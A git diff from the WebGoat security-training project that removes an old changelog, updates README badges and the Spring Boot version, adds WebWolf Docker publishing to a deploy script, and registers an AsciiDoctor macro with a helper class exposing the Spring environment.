Wrong image name mentioned in lesson for WebWolf

By default binds to ALL network interfaces #431
Fix for Docker not binding to any address by default
2018-04-11 20:22:19 +02:00 · 2018-01-30 07:18:05 +01:00 · 2018-01-29 15:43:19 +01:00 · 2018-01-29 15:32:02 +01:00 · 2018-01-29 15:29:48 +01:00 · 2018-01-21 17:46:43 +01:00
51 changed files with 464 additions and 550 deletions
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@ -1,245 +0,0 @@
-# Change Log
-
-## [7.1](https://github.com/WebGoat/WebGoat/tree/7.1) (2016-11-18)
-[Full Changelog](https://github.com/WebGoat/WebGoat/compare/7.0.1...7.1)
-
-**Implemented enhancements:**
-
- i8n highlighting [\#96](https://github.com/WebGoat/WebGoat/issues/96)
- Improve uniqueness of menu item Id's [\#45](https://github.com/WebGoat/WebGoat/issues/45)
-
-**Fixed bugs:**
-
- Stored XSS Lesson does not render message and attack does not fire [\#141](https://github.com/WebGoat/WebGoat/issues/141)
- Source code is not available for this lesson. [\#137](https://github.com/WebGoat/WebGoat/issues/137)
-
-**Closed issues:**
-
- Fix lesson client side filtering [\#272](https://github.com/WebGoat/WebGoat/issues/272)
- Reset lesson does not work anymore [\#271](https://github.com/WebGoat/WebGoat/issues/271)
- Lesson plans not loading with manual build and easy-run jar \(standalone jar\) not running at all [\#268](https://github.com/WebGoat/WebGoat/issues/268)
- Unable to download webgoat jar file [\#261](https://github.com/WebGoat/WebGoat/issues/261)
- Developer edition build isn't working in its entirety [\#260](https://github.com/WebGoat/WebGoat/issues/260)
- Amazon S3 downloadable JAR is missing [\#259](https://github.com/WebGoat/WebGoat/issues/259)
- Code does not compile on dev branch [\#258](https://github.com/WebGoat/WebGoat/issues/258)
- Executable jar crashes if empty .extract folder exist [\#251](https://github.com/WebGoat/WebGoat/issues/251)
- Java Error Message in Lesson "How to Bypass a Path Based Access Control Scheme" [\#240](https://github.com/WebGoat/WebGoat/issues/240)
- developer bootstrap says git is missing when it is installed [\#236](https://github.com/WebGoat/WebGoat/issues/236)
- Application Won't Start [\#234](https://github.com/WebGoat/WebGoat/issues/234)
- Restart lesson button isn't working [\#226](https://github.com/WebGoat/WebGoat/issues/226)
- Navigation to start page is broken after login [\#218](https://github.com/WebGoat/WebGoat/issues/218)
- Links in menu missing pointer cursor [\#216](https://github.com/WebGoat/WebGoat/issues/216)
- Restart lesson button not working [\#213](https://github.com/WebGoat/WebGoat/issues/213)
- WebGoat stops at  DEBUG - Exit: getEngine\(\) [\#211](https://github.com/WebGoat/WebGoat/issues/211)
- Labs: Remnant files and solved stages [\#208](https://github.com/WebGoat/WebGoat/issues/208)
- Labs: Navigating to Instructor java examples [\#206](https://github.com/WebGoat/WebGoat/issues/206)
- WebGoat 7.0 and ZAP 2.4.3 will not proxy [\#204](https://github.com/WebGoat/WebGoat/issues/204)
- Failing Build [\#201](https://github.com/WebGoat/WebGoat/issues/201)
- Missing mvn package of webgoat-container in README.MD [\#200](https://github.com/WebGoat/WebGoat/issues/200)
- Seems translation to Russian for "Congratulations. You have successfully completed this lesson."  phrase is broken. [\#199](https://github.com/WebGoat/WebGoat/issues/199)
- HtmlEncoder uses static methods but must be instantiated [\#195](https://github.com/WebGoat/WebGoat/issues/195)
- webgoat-container should unpack all the lessons [\#192](https://github.com/WebGoat/WebGoat/issues/192)
- Access Control Flaws, LAB stage 3: Remove the FindProfile screen [\#186](https://github.com/WebGoat/WebGoat/issues/186)
- Injection Flaws | XPath Injection date file path issue [\#184](https://github.com/WebGoat/WebGoat/issues/184)
- hints don't appear to work on labs [\#183](https://github.com/WebGoat/WebGoat/issues/183)
- Session Management Flaws - Spoof an Authentication Cookie render issue [\#181](https://github.com/WebGoat/WebGoat/issues/181)
- Challenge - Show\* buttons show on initial lesson load [\#180](https://github.com/WebGoat/WebGoat/issues/180)
- Http Basics - minor edits and change completion state [\#178](https://github.com/WebGoat/WebGoat/issues/178)
- Lab Cross-Site Scripting Stage 1 solution [\#176](https://github.com/WebGoat/WebGoat/issues/176)
- Backdoor lesson breaks menu CSS [\#175](https://github.com/WebGoat/WebGoat/issues/175)
- Redirect localhost:8080 to localhost:8080/WebGoat [\#173](https://github.com/WebGoat/WebGoat/issues/173)
- Session Fixation link in stage 2 does not work [\#170](https://github.com/WebGoat/WebGoat/issues/170)
- A failure occurred when execute the command "sh webgoat\_developer\_bootstrap.sh" [\#145](https://github.com/WebGoat/WebGoat/issues/145)
- Copy lessons into plugin\_lessons [\#254](https://github.com/WebGoat/WebGoat/issues/254)
- WebGoat // Lesson Plan and Solution are note available [\#242](https://github.com/WebGoat/WebGoat/issues/242)
- Lab: Client side filtering - broken path [\#232](https://github.com/WebGoat/WebGoat/issues/232)
- AXIS class not found error in  Web Services / WSDL Scanning  [\#222](https://github.com/WebGoat/WebGoat/issues/222)
- WSDL link in SOAP Request Lesson crashing with AXIS error [\#221](https://github.com/WebGoat/WebGoat/issues/221)
- Labs: RBAC stage 1 and 3 not working [\#209](https://github.com/WebGoat/WebGoat/issues/209)
- How to create a Legacy Lesson - instruction edit [\#177](https://github.com/WebGoat/WebGoat/issues/177)
- Can't tell when WebGoat has actually started when using: webgoat\_developer\_bootstrap.sh [\#75](https://github.com/WebGoat/WebGoat/issues/75)
-
-**Merged pull requests:**
-
- Add VMware fusion [\#264](https://github.com/WebGoat/WebGoat/pull/264) ([akiernan](https://github.com/akiernan))
- Remove Exception from method signature [\#257](https://github.com/WebGoat/WebGoat/pull/257) ([RubieV](https://github.com/RubieV))
- Code cleanup using @Test\(expected = Exception\) [\#256](https://github.com/WebGoat/WebGoat/pull/256) ([RubieV](https://github.com/RubieV))
- Added OWASP Labs badge [\#252](https://github.com/WebGoat/WebGoat/pull/252) ([psiinon](https://github.com/psiinon))
- updates from day 1 @AppSec EU [\#246](https://github.com/WebGoat/WebGoat/pull/246) ([misfir3](https://github.com/misfir3))
- Update java required version as stated in webgoat/webgoat\#234 [\#243](https://github.com/WebGoat/WebGoat/pull/243) ([span](https://github.com/span))
- Updates to Dev Bootstrap [\#239](https://github.com/WebGoat/WebGoat/pull/239) ([dilshanraja](https://github.com/dilshanraja))
- Fix broken start/home link on logo [\#229](https://github.com/WebGoat/WebGoat/pull/229) ([span](https://github.com/span))
- Developer controls [\#228](https://github.com/WebGoat/WebGoat/pull/228) ([span](https://github.com/span))
- Admin should also be able to see the solution, source and lesson plan. [\#224](https://github.com/WebGoat/WebGoat/pull/224) ([nbaars](https://github.com/nbaars))
- Fixed the classnames in the wsdd config file \(moved to different pack… [\#223](https://github.com/WebGoat/WebGoat/pull/223) ([nbaars](https://github.com/nbaars))
- Feature/169 [\#220](https://github.com/WebGoat/WebGoat/pull/220) ([nbaars](https://github.com/nbaars))
- Update README.MD [\#219](https://github.com/WebGoat/WebGoat/pull/219) ([muzir](https://github.com/muzir))
- Fix \#213 by changing the id of the restart button to the correct id [\#214](https://github.com/WebGoat/WebGoat/pull/214) ([span](https://github.com/span))
- Fixed \#184 [\#212](https://github.com/WebGoat/WebGoat/pull/212) ([nbaars](https://github.com/nbaars))
- Fix shebang [\#210](https://github.com/WebGoat/WebGoat/pull/210) ([nxadm](https://github.com/nxadm))
- Enable weak authentication cookie lesson  [\#207](https://github.com/WebGoat/WebGoat/pull/207) ([span](https://github.com/span))
- -- Remove raw type usage, add type check parameter. [\#205](https://github.com/WebGoat/WebGoat/pull/205) ([muzir](https://github.com/muzir))
- Update package references in readme [\#203](https://github.com/WebGoat/WebGoat/pull/203) ([span](https://github.com/span))
- Develop [\#202](https://github.com/WebGoat/WebGoat/pull/202) ([misfir3](https://github.com/misfir3))
- Fixes \#195 by adding static initialisation of the maps [\#197](https://github.com/WebGoat/WebGoat/pull/197) ([span](https://github.com/span))
- Add stage parameter in the session to keep track of current stage  [\#196](https://github.com/WebGoat/WebGoat/pull/196) ([span](https://github.com/span))
- webgoat-container should unpack all the lessons \#192 [\#193](https://github.com/WebGoat/WebGoat/pull/193) ([nbaars](https://github.com/nbaars))
-
-## [7.0.1](https://github.com/WebGoat/WebGoat/tree/7.0.1) (2016-02-01)
-**Implemented enhancements:**
-
- SEVERE: The web application \[/WebGoat\] appears to have started a thread named \[pool-7-thread-5\] but has failed to stop it. This is very likely to create a memory leak [\#124](https://github.com/WebGoat/WebGoat/issues/124)
- Cannot serialize session attribute [\#123](https://github.com/WebGoat/WebGoat/issues/123)
- Overview of which lessons maps to which WebGoat-Lessons project [\#107](https://github.com/WebGoat/WebGoat/issues/107)
- Remove ace js directory [\#103](https://github.com/WebGoat/WebGoat/issues/103)
- Move webgoat-container UP one directory [\#100](https://github.com/WebGoat/WebGoat/issues/100)
- Insecure login lesson has inline CSS background image is not applied [\#87](https://github.com/WebGoat/WebGoat/issues/87)
- Re-enable/update WebGoat Info link [\#26](https://github.com/WebGoat/WebGoat/issues/26)
- User Info/Logout Links  [\#25](https://github.com/WebGoat/WebGoat/issues/25)
- LessonInfo Service [\#23](https://github.com/WebGoat/WebGoat/issues/23)
- Reload/Update Menu [\#22](https://github.com/WebGoat/WebGoat/issues/22)
-
-**Fixed bugs:**
-
- Nightly build doesn't run [\#150](https://github.com/WebGoat/WebGoat/issues/150)
- Forced browsing lesson does not show success [\#143](https://github.com/WebGoat/WebGoat/issues/143)
- Failed to load resource: the server responded with a status of 404 \(Not Found\) [\#139](https://github.com/WebGoat/WebGoat/issues/139)
- Firefox and Edge miss one lesson in Menu [\#49](https://github.com/WebGoat/WebGoat/issues/49)
- Lesson Plan does not toggle on/off [\#46](https://github.com/WebGoat/WebGoat/issues/46)
- Clicking on 'LAB: Role Based Access Control' produces 'Invalid Session' in UI [\#44](https://github.com/WebGoat/WebGoat/issues/44)
- Lesson Loading Scrolls down page in Firefox [\#39](https://github.com/WebGoat/WebGoat/issues/39)
- WebGoat lessons do not load [\#32](https://github.com/WebGoat/WebGoat/issues/32)
- Properties are appended when loading plugins [\#29](https://github.com/WebGoat/WebGoat/issues/29)
-
-**Closed issues:**
-
- Exceptions for all lessons in "LAB: DB SQL Injection" and "LAB: SQL Injection" [\#174](https://github.com/WebGoat/WebGoat/issues/174)
- JSP Goathills lessons imports are not valid [\#171](https://github.com/WebGoat/WebGoat/issues/171)
- update or remove http://webgoat.github.io/ [\#167](https://github.com/WebGoat/WebGoat/issues/167)
- Provide over-rideable 'submitMethod' via AbstractLesson [\#165](https://github.com/WebGoat/WebGoat/issues/165)
- Update HTTP Basics lesson [\#162](https://github.com/WebGoat/WebGoat/issues/162)
- Command Injection Issue WebGoat 7 [\#156](https://github.com/WebGoat/WebGoat/issues/156)
- XML Injection does not work [\#151](https://github.com/WebGoat/WebGoat/issues/151)
- Plan is not available for this lesson. [\#138](https://github.com/WebGoat/WebGoat/issues/138)
- Multi level login lesson works but is missing area around the form [\#135](https://github.com/WebGoat/WebGoat/issues/135)
- SEVERE: The web application \[/WebGoat\] registered the JDBC driver \[org.h2.Driver\] but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDBC Driver has been forcibly unregistered [\#134](https://github.com/WebGoat/WebGoat/issues/134)
- hints are not refreshed when switching lessons [\#133](https://github.com/WebGoat/WebGoat/issues/133)
- Sauce labs fails when running oraclejdk8 [\#118](https://github.com/WebGoat/WebGoat/issues/118)
- Logging in sometimes goes to report card and misses category-menu [\#114](https://github.com/WebGoat/WebGoat/issues/114)
- Order of elements in deployment descriptor [\#112](https://github.com/WebGoat/WebGoat/issues/112)
- The jar snapshot doesn't run [\#108](https://github.com/WebGoat/WebGoat/issues/108)
- re-enable challenge handling in LessonInfoModel [\#97](https://github.com/WebGoat/WebGoat/issues/97)
- Review and cleanup releases and builds [\#90](https://github.com/WebGoat/WebGoat/issues/90)
- Review and cleanup Installation Docs [\#89](https://github.com/WebGoat/WebGoat/issues/89)
- Ajax Security: LAB: Client Side Filtering [\#86](https://github.com/WebGoat/WebGoat/issues/86)
- Close button on about dialog does not close the dialog [\#81](https://github.com/WebGoat/WebGoat/issues/81)
- Lessons Intermittently showing up in WebGoat [\#76](https://github.com/WebGoat/WebGoat/issues/76)
- Order of buttons switch after submit [\#73](https://github.com/WebGoat/WebGoat/issues/73)
- After login, there is no default lesson [\#72](https://github.com/WebGoat/WebGoat/issues/72)
- Intermittent Startup Error [\#71](https://github.com/WebGoat/WebGoat/issues/71)
- Discover Clues in HTML lesson doesn't work [\#70](https://github.com/WebGoat/WebGoat/issues/70)
- Eclipse import error for webgoat-container [\#66](https://github.com/WebGoat/WebGoat/issues/66)
- Reflected XSS Attacks error message error [\#65](https://github.com/WebGoat/WebGoat/issues/65)
- Labs with Stages all throw exceptions [\#64](https://github.com/WebGoat/WebGoat/issues/64)
- Spelling errors in: webgoat\_developer\_bootstrap.sh [\#63](https://github.com/WebGoat/WebGoat/issues/63)
- CSRF token by-pass lesson shows stacktrace [\#60](https://github.com/WebGoat/WebGoat/issues/60)
- Http Basics lessons fails to load [\#53](https://github.com/WebGoat/WebGoat/issues/53)
- Null Pointer Exception on every page [\#47](https://github.com/WebGoat/WebGoat/issues/47)
- Create support in client-side routing for 'stages' [\#42](https://github.com/WebGoat/WebGoat/issues/42)
- Implement Loading Spinner on Menu [\#41](https://github.com/WebGoat/WebGoat/issues/41)
- Lab - DOM-based cross-site scripting: Java Source produces XSS alert [\#38](https://github.com/WebGoat/WebGoat/issues/38)
- DOM Injection Lesson - Java Source does not work  [\#37](https://github.com/WebGoat/WebGoat/issues/37)
- Lesson Interdependency [\#33](https://github.com/WebGoat/WebGoat/issues/33)
- Hide menu functionality [\#28](https://github.com/WebGoat/WebGoat/issues/28)
- Consume LessonInfo Service to display title [\#24](https://github.com/WebGoat/WebGoat/issues/24)
- how to up webgoat to netbeans on mac os x. [\#14](https://github.com/WebGoat/WebGoat/issues/14)
-
-**Merged pull requests:**
-
- Disable cross-site scripting lab [\#191](https://github.com/WebGoat/WebGoat/pull/191) ([span](https://github.com/span))
- Adding OSSRH Repository on Parent Pom [\#190](https://github.com/WebGoat/WebGoat/pull/190) ([dougmorato](https://github.com/dougmorato))
- Setting GPG keyname as WebGoat in Parent Pom [\#189](https://github.com/WebGoat/WebGoat/pull/189) ([dougmorato](https://github.com/dougmorato))
- Fixining all the javadoc issues preventing the release [\#188](https://github.com/WebGoat/WebGoat/pull/188) ([dougmorato](https://github.com/dougmorato))
- Improving WebGoat Developer Bootstrap Script [\#187](https://github.com/WebGoat/WebGoat/pull/187) ([dougmorato](https://github.com/dougmorato))
- issue \#147 disabling broken lessons [\#185](https://github.com/WebGoat/WebGoat/pull/185) ([mayhew64](https://github.com/mayhew64))
- \#167 removing refrences to github.io in code [\#172](https://github.com/WebGoat/WebGoat/pull/172) ([misfir3](https://github.com/misfir3))
- \#165 support for custom submitMethod [\#166](https://github.com/WebGoat/WebGoat/pull/166) ([misfir3](https://github.com/misfir3))
- Remove Coverity Badge from README [\#164](https://github.com/WebGoat/WebGoat/pull/164) ([dougmorato](https://github.com/dougmorato))
- Forced browsing [\#163](https://github.com/WebGoat/WebGoat/pull/163) ([nbaars](https://github.com/nbaars))
- Moving lesson utilities to common project instead of AbstractLesson [\#155](https://github.com/WebGoat/WebGoat/pull/155) ([nbaars](https://github.com/nbaars))
- \#133 hiding hint on change of lesson/loesson load [\#153](https://github.com/WebGoat/WebGoat/pull/153) ([misfir3](https://github.com/misfir3))
- changed back to compile phase, package phase breaks the war-exec.jar … [\#152](https://github.com/WebGoat/WebGoat/pull/152) ([mayhew64](https://github.com/mayhew64))
- Fixes typo in README [\#149](https://github.com/WebGoat/WebGoat/pull/149) ([aravindc26](https://github.com/aravindc26))
- \#66 Fixing jar plugin lifecycle issue [\#148](https://github.com/WebGoat/WebGoat/pull/148) ([slavP](https://github.com/slavP))
- Tidy up CSRF lessons. [\#147](https://github.com/WebGoat/WebGoat/pull/147) ([ilatypov](https://github.com/ilatypov))
- Updated pom versions and cache .m2 on travis to speed build time [\#140](https://github.com/WebGoat/WebGoat/pull/140) ([dougmorato](https://github.com/dougmorato))
- Update dependency version, build number and unregister DB driver [\#136](https://github.com/WebGoat/WebGoat/pull/136) ([dougmorato](https://github.com/dougmorato))
-  SEVERE: The web application \[/WebGoat\] appears to have started a thr… [\#132](https://github.com/WebGoat/WebGoat/pull/132) ([nbaars](https://github.com/nbaars))
- Do not clean before mvn cobertura and coveralls [\#131](https://github.com/WebGoat/WebGoat/pull/131) ([dougmorato](https://github.com/dougmorato))
- Cannot serialize session attribute \#123 [\#130](https://github.com/WebGoat/WebGoat/pull/130) ([nbaars](https://github.com/nbaars))
- Maven-tomcat plugin fix and correct typo on JS file [\#129](https://github.com/WebGoat/WebGoat/pull/129) ([dougmorato](https://github.com/dougmorato))
- items ommited from menu spinner and some more clean up [\#127](https://github.com/WebGoat/WebGoat/pull/127) ([misfir3](https://github.com/misfir3))
- Coveralls should be on Parent Pom [\#126](https://github.com/WebGoat/WebGoat/pull/126) ([dougmorato](https://github.com/dougmorato))
- Adding badges for Coverity, Coveralls and Codacy [\#125](https://github.com/WebGoat/WebGoat/pull/125) ([dougmorato](https://github.com/dougmorato))
- Test enable Coverity SAST [\#122](https://github.com/WebGoat/WebGoat/pull/122) ([dougmorato](https://github.com/dougmorato))
- Improved README instructions for Easy Run [\#121](https://github.com/WebGoat/WebGoat/pull/121) ([dougmorato](https://github.com/dougmorato))
- Copy whole target folder, not just individual file [\#120](https://github.com/WebGoat/WebGoat/pull/120) ([dougmorato](https://github.com/dougmorato))
- Code cleanup and menu spinner [\#119](https://github.com/WebGoat/WebGoat/pull/119) ([misfir3](https://github.com/misfir3))
-  Logging in sometimes goes to report card and misses category-menu \#114 [\#117](https://github.com/WebGoat/WebGoat/pull/117) ([nbaars](https://github.com/nbaars))
- Copy output and target info upload to S3 folder [\#116](https://github.com/WebGoat/WebGoat/pull/116) ([dougmorato](https://github.com/dougmorato))
- Fix \#81 to activate close button in the modal footer [\#115](https://github.com/WebGoat/WebGoat/pull/115) ([span](https://github.com/span))
- Fix \#112 deployment descriptor elements in wrong order  [\#113](https://github.com/WebGoat/WebGoat/pull/113) ([span](https://github.com/span))
- \#103: removing ace directory, not in use [\#111](https://github.com/WebGoat/WebGoat/pull/111) ([misfir3](https://github.com/misfir3))
-  The jar snapshot doesn't run \#108 \(2\) [\#110](https://github.com/WebGoat/WebGoat/pull/110) ([nbaars](https://github.com/nbaars))
-  The jar snapshot doesn't run \#108 [\#109](https://github.com/WebGoat/WebGoat/pull/109) ([nbaars](https://github.com/nbaars))
- Removed credits from lessons [\#106](https://github.com/WebGoat/WebGoat/pull/106) ([nbaars](https://github.com/nbaars))
- Fixed classloading issues with Goathills lessons [\#105](https://github.com/WebGoat/WebGoat/pull/105) ([nbaars](https://github.com/nbaars))
-  i8n highlighting \#96  [\#102](https://github.com/WebGoat/WebGoat/pull/102) ([nbaars](https://github.com/nbaars))
- \#97, updating controls for hints, source, solution and plans on lessons [\#101](https://github.com/WebGoat/WebGoat/pull/101) ([misfir3](https://github.com/misfir3))
-  Button to force plugin reloading \#93  [\#99](https://github.com/WebGoat/WebGoat/pull/99) ([nbaars](https://github.com/nbaars))
- \#97, Hint controls for CHALLENGE Category lessons [\#98](https://github.com/WebGoat/WebGoat/pull/98) ([misfir3](https://github.com/misfir3))
- \#23, \#24 - LessonInfo Service now used for TitleView and HelpControsView [\#94](https://github.com/WebGoat/WebGoat/pull/94) ([misfir3](https://github.com/misfir3))
- Properties are appended when loading plugins \(\#29\) [\#88](https://github.com/WebGoat/WebGoat/pull/88) ([nbaars](https://github.com/nbaars))
- Added a lesson restart for lesson specific restart actions [\#85](https://github.com/WebGoat/WebGoat/pull/85) ([mayhew64](https://github.com/mayhew64))
- Fixing inconsistent merge issues implementing nbaars fixes [\#83](https://github.com/WebGoat/WebGoat/pull/83) ([dougmorato](https://github.com/dougmorato))
- Updated contributors and sponsors [\#82](https://github.com/WebGoat/WebGoat/pull/82) ([mayhew64](https://github.com/mayhew64))
- \#72, defaulting to firstLesson on initial redirect [\#80](https://github.com/WebGoat/WebGoat/pull/80) ([misfir3](https://github.com/misfir3))
-  Intermittent Startup Error \#71  [\#79](https://github.com/WebGoat/WebGoat/pull/79) ([nbaars](https://github.com/nbaars))
- Adding Coverity Static Code Analysis Scan integration [\#78](https://github.com/WebGoat/WebGoat/pull/78) ([dougmorato](https://github.com/dougmorato))
- Pom refactoring, javadocs compliance and Integration improvements [\#77](https://github.com/WebGoat/WebGoat/pull/77) ([dougmorato](https://github.com/dougmorato))
- Property files are now detected while extracting the plugin [\#74](https://github.com/WebGoat/WebGoat/pull/74) ([nbaars](https://github.com/nbaars))
- Recent UI Fixes [\#61](https://github.com/WebGoat/WebGoat/pull/61) ([misfir3](https://github.com/misfir3))
- Lab - DOM-based cross-site scripting: Java Source produces XSS alert \#38 [\#59](https://github.com/WebGoat/WebGoat/pull/59) ([nbaars](https://github.com/nbaars))
- Update README.MD [\#57](https://github.com/WebGoat/WebGoat/pull/57) ([mayhew64](https://github.com/mayhew64))
- Do NOT run Integration tests on pull requests [\#56](https://github.com/WebGoat/WebGoat/pull/56) ([dougmorato](https://github.com/dougmorato))
- Increase performance while extracting the plugins [\#55](https://github.com/WebGoat/WebGoat/pull/55) ([nbaars](https://github.com/nbaars))
-  Http Basics lessons fails to load \#53 [\#54](https://github.com/WebGoat/WebGoat/pull/54) ([nbaars](https://github.com/nbaars))
- Adding headless Integration Tests with Sauce Labs [\#50](https://github.com/WebGoat/WebGoat/pull/50) ([dougmorato](https://github.com/dougmorato))
-  Null Pointer Exception on every page \#47 [\#48](https://github.com/WebGoat/WebGoat/pull/48) ([nbaars](https://github.com/nbaars))
- menu and routing work [\#43](https://github.com/WebGoat/WebGoat/pull/43) ([misfir3](https://github.com/misfir3))
- Fixes for issue \#32 - lessons/menu not loading [\#40](https://github.com/WebGoat/WebGoat/pull/40) ([misfir3](https://github.com/misfir3))
- Fixed not serializable error when stopping/starting Tomcat [\#36](https://github.com/WebGoat/WebGoat/pull/36) ([nbaars](https://github.com/nbaars))
- Improved README, fixed copy lessons instructions, added developer bootstrap [\#35](https://github.com/WebGoat/WebGoat/pull/35) ([dougmorato](https://github.com/dougmorato))
- Improved Travis Build and Instructions on Readme [\#31](https://github.com/WebGoat/WebGoat/pull/31) ([dougmorato](https://github.com/dougmorato))
- recent modifications from my branch [\#30](https://github.com/WebGoat/WebGoat/pull/30) ([misfir3](https://github.com/misfir3))
- initial cut of paramView re-enabled [\#21](https://github.com/WebGoat/WebGoat/pull/21) ([misfir3](https://github.com/misfir3))
- Removing doc directory which contained 6 year old stale files [\#18](https://github.com/WebGoat/WebGoat/pull/18) ([dougmorato](https://github.com/dougmorato))
- First pull request, minor fix [\#17](https://github.com/WebGoat/WebGoat/pull/17) ([silicakes](https://github.com/silicakes))
- cookie view re-enabled [\#16](https://github.com/WebGoat/WebGoat/pull/16) ([misfir3](https://github.com/misfir3))
- Incremental UI changes [\#15](https://github.com/WebGoat/WebGoat/pull/15) ([misfir3](https://github.com/misfir3))
- Merged changes from WebGoat-Legacy to WebGoat [\#13](https://github.com/WebGoat/WebGoat/pull/13) ([nbaars](https://github.com/nbaars))
- Merge pull request \#48 from michaeldever/master  [\#11](https://github.com/WebGoat/WebGoat/pull/11) ([nbaars](https://github.com/nbaars))
- restoring READMe.txt [\#10](https://github.com/WebGoat/WebGoat/pull/10) ([misfir3](https://github.com/misfir3))
- Initial cut-over of backbone port [\#9](https://github.com/WebGoat/WebGoat/pull/9) ([misfir3](https://github.com/misfir3))
- Added a method so we can fetch the absolute path of a lesson [\#8](https://github.com/WebGoat/WebGoat/pull/8) ([nbaars](https://github.com/nbaars))
- Fixed rewriting paths in the jsp/js and css resources [\#7](https://github.com/WebGoat/WebGoat/pull/7) ([nbaars](https://github.com/nbaars))
- Classloader introduced [\#6](https://github.com/WebGoat/WebGoat/pull/6) ([nbaars](https://github.com/nbaars))
- Instructions for manual deployment [\#5](https://github.com/WebGoat/WebGoat/pull/5) ([iammyr](https://github.com/iammyr))
- Renamed the jar file [\#4](https://github.com/WebGoat/WebGoat/pull/4) ([nbaars](https://github.com/nbaars))
- Fixed classloading issues when a lesson contains an inner class. The plu... [\#3](https://github.com/WebGoat/WebGoat/pull/3) ([nbaars](https://github.com/nbaars))
- Generate separate jar file to use in the lessons project [\#2](https://github.com/WebGoat/WebGoat/pull/2) ([nbaars](https://github.com/nbaars))
- Bug fix: lesson solution not showing  [\#1](https://github.com/WebGoat/WebGoat/pull/1) ([nbaars](https://github.com/nbaars))
-
-
-
-\* *This Change Log was automatically generated by [github_changelog_generator](https://github.com/skywinder/Github-Changelog-Generator)*
--- a/README.MD
+++ b/README.MD
@ -4,8 +4,8 @@
 [![Coverage Status](https://coveralls.io/repos/WebGoat/WebGoat/badge.svg?branch=develop&service=github)](https://coveralls.io/github/WebGoat/WebGoat?branch=master)
 [![Codacy Badge](https://api.codacy.com/project/badge/b69ee3a86e3b4afcaf993f210fccfb1d)](https://www.codacy.com/app/dm/WebGoat)
 [![Dependency Status](https://www.versioneye.com/user/projects/562da95ae346d7000e0369aa/badge.svg?style=flat)](https://www.versioneye.com/user/projects/562da95ae346d7000e0369aa)
-[![OWASP Labs](https://img.shields.io/badge/owasp-labs-orange.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects)
-
+[![OWASP Labs](https://img.shields.io/badge/owasp-lab%20project-f7b73c.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects) 
+[![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest) 

 # Introduction

@ -121,7 +121,7 @@ server.address=x.x.x.x
 We supply a complete development environment using Vagrant, to run WebGoat with Vagrant you must first have Vagrant and Virtualbox installed.

 ```shell
-   $ cd WebGoat/webgoat-images/vagrant-users
+   $ cd WebGoat/webgoat-images/vagrant-training
   $ vagrant up
 ```

--- a/pom.xml
+++ b/pom.xml
@ -20,7 +20,7 @@
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
-        <version>1.5.5.RELEASE</version>
+        <version>1.5.9.RELEASE</version>
    </parent>

    <licenses>
--- a/scripts/deploy-webgoat.sh
+++ b/scripts/deploy-webgoat.sh
@ -14,8 +14,26 @@ elif [ ! -z "${TRAVIS_TAG}" ]; then
  # Creating a tag build we push it to Docker with that tag
  docker build --build-arg webgoat_version=${TRAVIS_TAG:1} -f Dockerfile -t $REPO:${TRAVIS_TAG} -t $REPO:latest .
  docker push $REPO
-elif [ "${BRANCH}" == "develop" ]; then
-  docker build -f Dockerfile -t $REPO:snapshot .
+#elif [ "${BRANCH}" == "develop" ]; then
+#  docker build -f Dockerfile -t $REPO:snapshot .
+#  docker push $REPO
+else
+  echo "Skipping releasing to DockerHub because it is a build of branch ${BRANCH}"
+fi
+
+
+export REPO=webgoat/webwolf
+cd ..
+cd webwolf
+ls target/
+
+if [ "${BRANCH}" == "master" ] && [ ! -z "${TRAVIS_TAG}" ]; then
+  # If we push a tag to master this will update the LATEST Docker image and tag with the version number
+  docker build --build-arg webwolf_version=${TRAVIS_TAG:1} -f Dockerfile -t $REPO:latest -t $REPO:${TRAVIS_TAG} .
+  docker push $REPO
+elif [ ! -z "${TRAVIS_TAG}" ]; then
+  # Creating a tag build we push it to Docker with that tag
+  docker build --build-arg webwolf_version=${TRAVIS_TAG:1} -f Dockerfile -t $REPO:${TRAVIS_TAG} -t $REPO:latest .
  docker push $REPO
 else
  echo "Skipping releasing to DockerHub because it is a build of branch ${BRANCH}"
--- a/webgoat-container/documentation/csrf-lesson.gliffy
+++ b/webgoat-container/documentation/csrf-lesson.gliffy
--- a/webgoat-container/documentation/csrf-lessons.png
+++ b/webgoat-container/documentation/csrf-lessons.png
--- a/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java
@ -34,6 +34,8 @@ import com.google.common.collect.Maps;
 import com.google.common.collect.Sets;
 import lombok.extern.slf4j.Slf4j;
 import org.asciidoctor.Asciidoctor;
+import org.asciidoctor.extension.JavaExtensionRegistry;
+import org.owasp.webgoat.asciidoc.WebWolfMacro;
 import org.owasp.webgoat.i18n.Language;
 import org.thymeleaf.TemplateProcessingParameters;
 import org.thymeleaf.resourceresolver.IResourceResolver;
@ -82,6 +84,9 @@ public class AsciiDoctorTemplateResolver extends TemplateResolver {
                    return new ByteArrayInputStream(new byte[0]);
                } else {
                    StringWriter writer = new StringWriter();
+                    JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
+                    extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
+
                    asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());
                    return new ByteArrayInputStream(writer.getBuffer().toString().getBytes(UTF_8));
                }
--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/EnvironmentExposure.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/EnvironmentExposure.java
@ -0,0 +1,25 @@
+package org.owasp.webgoat.asciidoc;
+
+import org.springframework.beans.BeansException;
+import org.springframework.context.ApplicationContext;
+import org.springframework.context.ApplicationContextAware;
+import org.springframework.core.env.Environment;
+import org.springframework.stereotype.Component;
+
+/**
+ * Make environment available in the asciidoc code (which you cannot inject because it is handled by the framework)
+ */
+@Component
+public class EnvironmentExposure implements ApplicationContextAware {
+
+    private static ApplicationContext context;
+
+    public static Environment getEnv() {
+        return context.getEnvironment();
+    }
+
+    @Override
+    public void setApplicationContext(ApplicationContext applicationContext) throws BeansException {
+        context = applicationContext;
+    }
+}
